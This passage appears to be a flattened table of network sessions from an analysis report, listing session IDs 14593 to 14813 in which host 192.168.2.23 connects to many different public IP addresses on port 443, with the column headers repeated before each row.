                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14593192.168.2.2347882190.131.72.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14594192.168.2.234297470.107.97.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14595192.168.2.2356442113.32.195.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14596192.168.2.2357754207.72.107.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14597192.168.2.234693490.12.76.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14598192.168.2.234060284.134.134.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14599192.168.2.233792852.101.231.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14600192.168.2.2356558191.176.234.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14601192.168.2.2334298206.252.192.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14602192.168.2.2337730158.59.8.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14603192.168.2.233933047.134.57.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14604192.168.2.2349378204.29.132.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14605192.168.2.2337236172.169.134.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14606192.168.2.2358982219.71.201.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14607192.168.2.2359840112.68.156.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14608192.168.2.2348482177.201.160.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14609192.168.2.2339442187.245.10.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14610192.168.2.235135688.253.248.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14611192.168.2.2347598114.81.112.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14612192.168.2.2350268187.132.150.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14613192.168.2.2348190104.221.131.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14614192.168.2.2342190202.21.74.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14615192.168.2.2334282140.228.219.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14616192.168.2.2341152123.141.243.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14617192.168.2.2345476148.64.208.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14618192.168.2.234473817.114.168.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14619192.168.2.234058045.204.230.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14620192.168.2.2347688188.217.144.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14621192.168.2.235140620.195.24.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14622192.168.2.2349794194.108.224.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14623192.168.2.233401254.228.192.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14624192.168.2.2354462220.198.6.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14625192.168.2.233622037.197.229.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14626192.168.2.2342554147.199.55.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14627192.168.2.235875877.205.176.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14628192.168.2.2336966172.105.155.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14629192.168.2.2348376202.107.161.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14630192.168.2.23368569.133.117.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14631192.168.2.2356470118.250.170.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14632192.168.2.2343800153.149.188.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14633192.168.2.2347344106.70.130.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14634192.168.2.2359184204.80.253.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14635192.168.2.2341486150.168.243.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14636192.168.2.2360238134.10.57.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14637192.168.2.2349898159.48.40.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14638192.168.2.2353792165.158.79.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14639192.168.2.2343052193.45.246.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14640192.168.2.2343120136.183.237.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14641192.168.2.2359352157.185.213.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14642192.168.2.2347460132.230.166.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14643192.168.2.233690261.132.173.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14644192.168.2.233672280.232.5.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14645192.168.2.2344518199.80.183.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14646192.168.2.2342404114.187.66.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14647192.168.2.233792478.206.44.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14648192.168.2.234386280.163.253.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14649192.168.2.235778034.53.162.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14650192.168.2.235404259.84.231.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14651192.168.2.2356152122.115.214.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14652192.168.2.2358180217.51.12.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14653192.168.2.234172451.52.225.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14654192.168.2.234859886.215.47.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14655192.168.2.234149499.62.228.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14656192.168.2.2343704123.216.116.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14657192.168.2.2339054125.171.219.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14658192.168.2.234783232.155.186.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14659192.168.2.235671054.64.214.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14660192.168.2.2351730155.93.155.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14661192.168.2.2357626152.203.193.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14662192.168.2.235912223.247.20.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14663192.168.2.235988080.189.53.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14664192.168.2.234524061.255.140.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14665192.168.2.2337666159.138.182.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14666192.168.2.233835825.143.241.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14667192.168.2.235054654.101.21.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14668192.168.2.233466693.0.252.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14669192.168.2.235042069.84.86.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14670192.168.2.233961236.12.109.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14671192.168.2.2346028174.19.254.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14672192.168.2.2333760187.150.156.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14673192.168.2.2337270206.105.6.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14674192.168.2.2349344206.51.236.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14675192.168.2.2352810140.248.217.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14676192.168.2.2335778190.171.157.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14677192.168.2.233802481.217.62.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14678192.168.2.2348646182.23.155.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14679192.168.2.2343490203.190.12.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14680192.168.2.2339050170.63.55.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14681192.168.2.2354160173.27.206.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14682192.168.2.236063497.37.114.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14683192.168.2.234899089.81.211.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14684192.168.2.2338748216.162.178.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14685192.168.2.2347582134.79.64.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14686192.168.2.2334246175.146.92.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14687192.168.2.2342202133.195.25.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14688192.168.2.2337756139.138.84.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14689192.168.2.2351516196.95.184.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14690192.168.2.2334690177.202.131.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14691192.168.2.2336222136.131.47.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14692192.168.2.234851031.134.233.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14693192.168.2.2344972157.85.29.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14694192.168.2.234231698.157.26.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14695192.168.2.2359434116.144.108.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14696192.168.2.233468883.65.207.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14697192.168.2.2356136101.177.238.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14698192.168.2.2351118141.126.29.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14699192.168.2.2356216150.253.223.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14700192.168.2.2358498193.33.66.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14701192.168.2.2357844223.85.215.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14702192.168.2.2353978209.87.118.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14703192.168.2.235670247.225.102.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14704192.168.2.2344272146.188.2.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14705192.168.2.2357878185.199.129.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14706192.168.2.2348508137.180.169.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14707192.168.2.234265883.122.251.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14708192.168.2.2335084171.116.232.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14709192.168.2.234429881.246.67.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14710192.168.2.2359360191.68.86.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14711192.168.2.234042061.146.48.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14712192.168.2.235901839.239.116.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14713192.168.2.2358174123.133.8.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14714192.168.2.234571265.168.218.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14715192.168.2.234041244.11.41.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14716192.168.2.2336766105.36.230.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14717192.168.2.2360540181.78.179.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14718192.168.2.2345980120.79.237.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14719192.168.2.234172020.252.171.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14720192.168.2.233859649.18.233.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14721192.168.2.233480664.138.217.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14722192.168.2.2357968104.103.61.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14723192.168.2.2340532194.64.83.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14724192.168.2.2345354212.111.163.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14725192.168.2.234592873.11.34.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14726192.168.2.2345704133.17.171.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14727192.168.2.233371245.199.11.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14728192.168.2.2353606193.129.192.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14729192.168.2.2335636170.190.54.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14730192.168.2.235285636.143.236.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14731192.168.2.234169835.92.255.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14732192.168.2.2338560106.1.65.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14733192.168.2.2359414219.136.199.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14734192.168.2.233683663.252.155.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14735192.168.2.234285465.230.149.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14736192.168.2.2333364184.51.45.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14737192.168.2.2351120140.23.249.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14738192.168.2.2357196121.67.84.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14739192.168.2.233532820.86.222.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14740192.168.2.2350768133.228.166.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14741192.168.2.2342078180.139.176.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14742192.168.2.235104625.200.153.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14743192.168.2.235105265.79.50.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14744192.168.2.234516417.161.7.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14745192.168.2.2335642142.242.8.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14746192.168.2.2335958210.198.119.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14747192.168.2.2359714201.194.233.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14748192.168.2.235188082.167.61.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14749192.168.2.23411605.48.236.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14750192.168.2.233394851.41.62.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14751192.168.2.233517841.120.37.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14752192.168.2.233576492.121.77.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14753192.168.2.235308454.57.33.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14754192.168.2.2344888195.158.239.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14755192.168.2.2336110125.245.117.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14756192.168.2.2348132217.99.167.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14757192.168.2.2337470133.142.11.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14758192.168.2.2339400133.226.104.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14759192.168.2.23420145.220.211.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14760192.168.2.2354008155.124.115.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14761192.168.2.2344756133.75.200.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14762192.168.2.2354182112.1.15.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14763192.168.2.2349846145.106.251.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14764192.168.2.2351272195.8.175.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14765192.168.2.2342220185.246.107.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14766192.168.2.2359084102.46.6.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14767192.168.2.2340228177.239.206.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14768192.168.2.234464489.0.163.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14769192.168.2.233767064.101.246.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14770192.168.2.234210434.59.246.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14771192.168.2.2339836115.174.149.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14772192.168.2.233642698.15.105.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14773192.168.2.2338056120.205.251.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14774192.168.2.235469277.127.236.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14775192.168.2.2335422185.148.98.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14776192.168.2.2338890204.158.98.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14777192.168.2.23594428.178.18.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14778192.168.2.2337124219.106.126.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14779192.168.2.235513638.29.176.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14780192.168.2.235626438.114.181.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14781192.168.2.234157460.195.228.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14782192.168.2.2342210129.100.111.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14783192.168.2.235737223.232.185.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14784192.168.2.235353038.89.11.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14785192.168.2.235701691.236.43.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14786192.168.2.2339410213.22.251.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14787192.168.2.2341520149.196.202.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14788192.168.2.2341242121.235.69.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14789192.168.2.233974845.50.59.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14790192.168.2.234107453.154.166.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14791192.168.2.233433665.8.205.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14792192.168.2.233639275.230.75.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14793192.168.2.235478095.53.179.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14794192.168.2.2340226187.92.207.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14795192.168.2.2335226159.209.49.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14796192.168.2.2346334148.237.187.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14797192.168.2.2358854171.250.49.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14798192.168.2.2348632133.15.231.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14799192.168.2.234073454.99.242.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14800192.168.2.2350650186.19.152.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14801192.168.2.2355926156.177.88.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14802192.168.2.2354158207.38.175.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14803192.168.2.23351261.201.246.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14804192.168.2.2356678141.205.0.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14805192.168.2.2356930219.223.135.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14806192.168.2.233462413.223.236.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14807192.168.2.2357374171.103.167.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14808192.168.2.233750048.78.189.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14809192.168.2.2341386157.24.191.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14810192.168.2.233819458.196.50.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14811192.168.2.233790891.158.217.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14812192.168.2.2333470217.96.203.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14813192.168.2.2335078152.147.47.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
